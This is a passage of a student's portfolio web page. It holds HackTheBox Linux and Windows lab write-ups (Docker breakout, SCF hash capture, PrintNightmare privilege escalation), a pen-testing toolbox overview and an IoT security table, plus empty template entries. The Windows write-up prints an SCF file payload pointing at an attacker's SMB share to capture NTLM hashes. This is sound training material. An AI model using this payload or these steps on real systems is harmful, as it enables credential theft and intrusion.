                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
